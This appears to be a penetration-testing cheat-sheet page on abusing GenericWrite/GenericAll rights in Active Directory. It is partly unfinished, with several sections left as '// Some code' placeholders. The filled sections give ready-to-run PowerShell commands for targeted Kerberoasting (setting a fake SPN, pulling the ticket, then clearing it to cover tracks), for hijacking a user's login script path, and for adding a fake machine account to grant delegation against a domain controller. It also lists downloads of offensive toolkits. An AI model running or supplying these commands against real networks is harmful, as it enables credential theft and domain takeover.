GenericWrite/ GenericAll

download:

git clone https://github.com/SecureAuthCorp/impacket.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/Kevin-Robertson/Powermad.git
git clone https://github.com/GhostPack/Rubeus.git

GenericWrite:

User:

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
## Kerberoasting
Set-DomainObject -Credential $Cred -Identity Target_User -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser Target_User | Select serviceprinciplename
Get-DomainSPNTicket -Credential $Cred Target_User | fl
# Opsec remove
Set-DomainObject -Credential $Cred -Identity Target_User -Clear serviceprincipalname


## Login scripts
Set-DomainObject -Identity Target_User -SET @{scriptpath="C:\Windows\Tasks\login.ps1"}

Group:

// Some code

Object:

// Some code

Machine account:

On Compromised device:

# Import PowerMad
Import-Module ./PowerMad.ps1

# Set variables
Set-Variable -Name "FakePC" -Value "FAKE01"
Set-Variable -Name "targetComputer" -Value "DC"

# With Powermad, Add the new fake computer object to AD.
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege.
Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')

# With Built-in AD modules, check that the last command worked.
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount

WriteAll:

User:

// Some code

Group:

// Some code

Object:

// Some code

PreviousAddKeyLinkCredential NextWriteOwner

Last updated 2 years ago